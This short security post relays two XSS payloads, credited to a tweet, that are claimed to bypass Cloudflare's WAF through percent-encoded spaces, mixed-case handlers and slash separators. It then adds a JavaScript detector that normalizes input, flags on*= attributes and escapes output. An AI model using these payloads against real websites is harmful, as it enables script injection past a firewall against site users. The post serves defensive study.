A recent tweet shared two XSS payloads for Cloudflare WAF bypass.

First payload:
<img%20hrEF="x"%20sRC="data:x","%20oNLy=1%20oNErrOR=prompt`1`//>

This payload attempts to bypass Cloudflare's WAF with a crafted image tag: the spaces are written as %20, the attribute names are in mixed case, and an oNLy=1 attribute precedes the oNErrOR handler.

Second payload:
<img//////src=x oNlY=1 oNerror=alert('xxs')//

Both payloads aim to evade the security measures set by Cloudflare's WAF. Security researchers are advised to test these payloads cautiously. Potential impact and mitigation strategies should be considered.

Original tweet: https://twitter.com/Shad0wH3x/status/1888044832796606469
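
A defensive check built from what the two strings above have in common, as an added example (not from the tweet or from Cloudflare): it percent-decodes and case-folds input, lists every on*= attribute in a tag open while treating "/" as an attribute separator, and shows that HTML-encoding on output leaves no tag for the browser to parse. Function names and the benign sample are this example's own.

```javascript
// Added example. The first two SAMPLES are the strings quoted on this page;
// the third is a constructed benign tag. Function names are hypothetical.
const SAMPLES = [
  '<img%20hrEF="x"%20sRC="data:x","%20oNLy=1%20oNErrOR=prompt`1`//>',
  "<img//////src=x oNlY=1 oNerror=alert('xxs')//",
  '<img src="/logo.png" alt="only one">',
];

// Percent-decode (bounded, tolerant of malformed escapes), then case-fold,
// so "%20oNErrOR" and " onerror" look the same to the check below.
function normalize(input) {
  let s = input;
  for (let i = 0; i < 3; i++) {
    let decoded;
    try { decoded = decodeURIComponent(s); } catch (e) { break; }
    if (decoded === s) break;
    s = decoded;
  }
  return s.toLowerCase();
}

// List every on*= attribute found inside a tag open. This is a regex
// approximation of HTML parsing, meant for logging and alerting.
function inlineHandlers(input) {
  const found = [];
  // A tag open runs to ">" or to end of input: unclosed tags still parse.
  for (const tag of normalize(input).matchAll(/<[a-z][^>]*/g)) {
    // Attributes may follow whitespace, "/" or a closing quote.
    for (const m of tag[0].matchAll(/[\s\/"'](on[a-z]+)\s*=/g)) found.push(m[1]);
  }
  return found;
}

// Output encoding for HTML text and quoted-attribute contexts: the primary
// mitigation, independent of whether a WAF rule matched.
function escapeHtml(text) {
  return text.replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

for (const s of SAMPLES) {
  console.log(JSON.stringify(inlineHandlers(s)), escapeHtml(s));
}
```

The check reports any attribute whose name starts with "on", including the non-handler `only`, which suits an allowlist policy that rejects all such attributes in user-supplied markup.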